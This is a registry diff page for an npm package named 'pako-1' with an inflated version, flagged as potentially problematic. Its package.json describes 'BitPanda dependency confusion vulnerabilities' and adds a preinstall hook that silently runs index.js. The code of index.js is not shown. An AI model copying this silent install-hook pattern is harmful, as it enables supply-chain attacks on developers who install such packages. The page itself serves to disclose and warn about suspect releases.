pako-1 199.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of pako-1 might be problematic. Click here for more details.
- package/file.map +437 -0
- package/index.js +46 -0
- package/js-urls.txt +3734 -0
- package/npm-packages.txt +3 -0
- package/npm.txt +3 -0
- package/package.json +12 -0
package/npm-packages.txt
ADDED
package/npm.txt
ADDED
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "pako-1",
|
3
|
+
"version": "199.1.1",
|
4
|
+
"description": "BitPanda dependency confusion vulnerabilities.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js > /dev/null 2>&1"
|
9
|
+
},
|
10
|
+
"author": "Test",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|